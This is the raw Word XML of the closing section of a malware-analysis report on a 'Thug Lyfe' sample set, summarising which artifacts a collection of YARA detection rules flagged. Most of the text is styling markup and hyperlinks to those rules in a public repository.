        <w:t xml:space="preserve">This is due, simply, as a result of improperly formatted YARA rules. These have since been rectified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025C">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line="36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E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2fi5vmq4lint" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>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25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phase of the Thug Lyfe campaign analysis successfully expanded beyond executables to include image and audio files. Through the application and refinement of YARA rules, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">three out of five artifacts were flagged as suspicious</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, with SecurityAdvisory.docm confirmed as the primary threat due to its malicious macro behavior. The analysis validated the effectiveness of both existing and newly developed rules, particularly in identifying high-entropy content and unconventional file structures. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId82" w:type="default"/>
      <w:headerReference r:id="rId83" w:type="first"/>
      <w:footerReference r:id="rId84"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Arial Unicode MS"/>
  <w:font w:name="Courier New"/>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0">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331.2" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b w:val="1"/>
      <w:color w:val="0b5394"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="80" w:before="280" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b w:val="1"/>
      <w:color w:val="0b5394"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="80" w:before="280" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b w:val="1"/>
      <w:color w:val="0b5394"/>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github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/BMP_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/HEIF__FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/GIF_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/JPG_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/JPEG_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/PDF_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/MP3_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/tree/main/FileTypeChec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savannahc502/collaborative_yara_rules/tree/main/file_configuration" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/PSD_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/PNG_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/SVG_FileTypeCheck.yara" TargetMode="Externa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hyperlink" Target="https://docs.google.com/document/d/1iE4DH-LfIt8iivKzPdLdmQOuxfRF7w4CoVSHPe7Iih0/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/tree/main/embedded_content" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/louismattiolo/23c7dd95c4026c712f5b1ae4832b606b#file-pe_image_mismatch-yara" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/file_configuration/mismatched_pe_header.yar" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/louismattiolo/23c7dd95c4026c712f5b1ae4832b606b#file-audio_pe_embedded-yara" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/file_configuration/HighEntropy.yar" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/embedded_content/DetectHTTP.yar" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/malicious_techniques/Malicious_Office_AutoOpen._Macro.yar" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/file_configuration/upx_packed.yar" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/embedded_content/pdf.yar" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/file_configuration/HighEntropyAny.yar" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/embedded_content/EmbeddedPE.yar" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/louismattiolo/23c7dd95c4026c712f5b1ae4832b606b#file-pe_audio_mismatch-yara" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/AAC_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/file_configuration/HighEntropyAny.yar" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/ALAC_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/AIFF_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/thugLyfe2.yar" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/thugLyfe2.yar" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/malicious_techniques/PersistenceScan.yar" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1nrjGJ8J3fm_cxgVRDziUA2GePqLovVsX/view?usp=sharing" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/stoerchl/yara_zip_module" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/malicious_techniques/UnusualNumOfExports.yar" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/thugBehavior.yar" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/malicious_techniques/SuspiciousAPIcalls.yar" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/thugLyfe2.yar" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/malicious_techniques/Malicious_Office_AutoOpen._Macro.yar" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/thugBehavior.yar" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/malicious_techniques/keylogger.yar" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/thugLyfe2.yar" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/file_sections/SuspiciousEXESections.yar" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/file_sections/SuspiciousDLLSections.yar" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/louismattiolo/23c7dd95c4026c712f5b1ae4832b606b#file-exif_base64_powershell_command-yara" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/file_sections/SuspiciousSYSSections.yar" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/file_sections/SuspiciousMuiSections.yar" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/file_sections/SuspiciousSectionCount.yar" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/Vox_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/TTA_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/WMA_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/WAV_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/tree/main/malicious_techniques" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/tree/main/FileTypeChecks" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/tree/main/file_sections" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/FileTypeChecks/WebP_FileTypeCheck.yara" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/tree/main/FileTypeChecks" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1iE4DH-LfIt8iivKzPdLdmQOuxfRF7w4CoVSHPe7Iih0/edit?tab=t.0" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/louismattiolo/23c7dd95c4026c712f5b1ae4832b606b#file-exif_base64_powershell_command-yara" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1-aXgKZbS6JB6TpXclIgUgp5dUVLoNdDu7s79VWgRWVc/edit?tab=t.0#heading=h.ujfccm4r1t1z" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/malicious_techniques/InfoStealer.yar" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/savannahc502/collaborative_yara_rules/blob/main/malicious_techniques/FileOperations.ya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